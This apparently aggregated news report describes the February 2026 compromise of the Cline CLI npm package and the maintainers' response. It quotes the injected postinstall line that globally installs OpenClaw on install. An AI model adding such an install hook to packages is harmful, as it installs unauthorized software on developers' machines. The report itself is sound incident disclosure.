"On February 17, 2026, at 3:26 AM PT, an unauthorized party used a compromised npm publish token to publish an update to Cline CLI on the NPM registry: cline@2.3.0, the maintainers of the Cline package said in an advisory. The published package contains a modified package.json with an added postinstall script: 'postinstall": "npm install -g openclaw@latest.' As a result, this causes OpenClaw to be installed on the developer's machine when Cline version 2.3.0 is installed."
"To mitigate the unauthorized publication, Cline maintainers have released version 2.4.0. Version 2.3.0 has since been deprecated and the compromised token has been revoked. Cline also said the npm publishing mechanism has been updated to support OpenID Connect (OIDC) via GitHub Actions. In a post on X, the Microsoft Threat Intelligence team said it observed a "small but noticeable uptick" in OpenClaw installations on February 17, 2026, as a result of the supply chain compromise of the Cline CLI package. According to StepSecurity, the compromised Cline package was downloaded roughly 4,000 times during the eight-hour stretch."
An unauthorized npm publish token was used to publish cline@2.3.0 with a modified package.json that added a postinstall script to run "npm install -g openclaw@latest." The added postinstall caused OpenClaw to be installed on developer machines when Cline 2.3.0 was installed. No additional modifications or overt malicious behavior were observed, but the OpenClaw installation was not authorized or intended. The compromise affected installs during an approximately eight-hour window on February 17, 2026, and did not impact the Cline VS Code extension or JetBrains plugin. Cline released 2.4.0, deprecated 2.3.0, revoked the compromised token, and updated npm publishing to support OIDC. Microsoft Threat Intelligence observed an uptick in OpenClaw installs, and StepSecurity reported roughly 4,000 downloads during the window.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]